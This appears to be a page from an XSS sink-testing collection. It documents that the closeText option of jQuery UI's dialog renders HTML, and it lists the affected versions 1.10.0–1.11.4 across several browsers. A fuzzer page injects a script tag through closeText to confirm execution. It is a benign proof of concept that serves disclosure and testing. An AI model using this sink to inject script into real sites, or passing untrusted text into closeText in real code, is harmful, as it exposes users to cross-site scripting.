jQuery UI .dialog() closeText property DOM XSS Sink.

https://github.com/jquery/jquery-ui/pull/1622

jQuery 2.1.4 is used as the base jQuery library.

$('#div').dialog({ closeText: '<html injection>' });

By skeptic_fx
Tags: jquery, jqueryui, xss

Results


Tested on: Chrome - 68 - Mac OS X
Fuzz data: 1.11.4, 1.11.3, 1.11.2, 1.11.1, 1.11.0, 1.10.4, 1.10.3, 1.10.2, 1.10.1, 1.10.0

Tested on: Safari - 9.1.2 - Mac OS X
Fuzz data: 1.11.4, 1.11.3, 1.11.2, 1.11.1, 1.11.0, 1.10.4, 1.10.3, 1.10.2, 1.10.1, 1.10.0

Tested on: Firefox - 60 - Windows 7
Fuzz data: 1.11.4, 1.11.3, 1.11.2, 1.11.1, 1.11.0, 1.10.4, 1.10.3, 1.10.2, 1.10.1, 1.10.0

Tested on: Chrome Mobile - 41 - Android
Fuzz data: 1.11.4, 1.11.3, 1.11.2, 1.11.1, 1.11.0, 1.10.4, 1.10.3, 1.10.2, 1.10.1, 1.10.0

Tested on: Googlebot - 2.1 - undefined
Fuzz data: 1.11.4, 1.11.3, 1.11.2, 1.11.1, 1.11.0, 1.10.4, 1.10.3, 1.10.2, 1.10.1, 1.10.0

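User Script (FUZZER)

<head>
<!-- Base library: jQuery 2.1.4. The jQuery UI version is filled in from the fuzz data. -->
<script src="https://code.jquery.com/jquery-2.1.4.js"></script>
<script src="https://code.jquery.com/ui/***DS_JQUERYUI_VERSIONS***/jquery-ui.js"></script>

<script>
    $(document).ready(function () {
        // closeText is the sink under test: if the widget inserts it as HTML,
        // the injected script runs and reports the jQuery UI version via addResult().
        $('#xss').dialog({ closeText: '<script>addResult("***DS_JQUERYUI_VERSIONS***")<\/script>' });
    });
</script>
</head>
<body>
<div id="xss" title="Dialog Title">Fuzz Content Here - ***DS_JQUERYUI_VERSIONS***</div>
</body>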

Fuzz Data (FUZZER)

// https://developers.google.com/speed/libraries/#jquery-ui
var DS_JQUERYUI_VERSIONS = ['1.11.4','1.11.3','1.11.2','1.11.1','1.11.0','1.10.4','1.10.3','1.10.2','1.10.1','1.10.0','1.9.2','1.9.1','1.9.0','1.8.24','1.8.23','1.8.22','1.8.21','1.8.20','1.8.19','1.8.18','1.8.17','1.8.16','1.8.15','1.8.14','1.8.13','1.8.12','1.8.11','1.8.10','1.8.9','1.8.8','1.8.7','1.8.6','1.8.5','1.8.4','1.8.2','1.8.1','1.8.0','1.7.3','1.7.2','1.7.1','1.7.0','1.6.0','1.5.3','1.5.2'];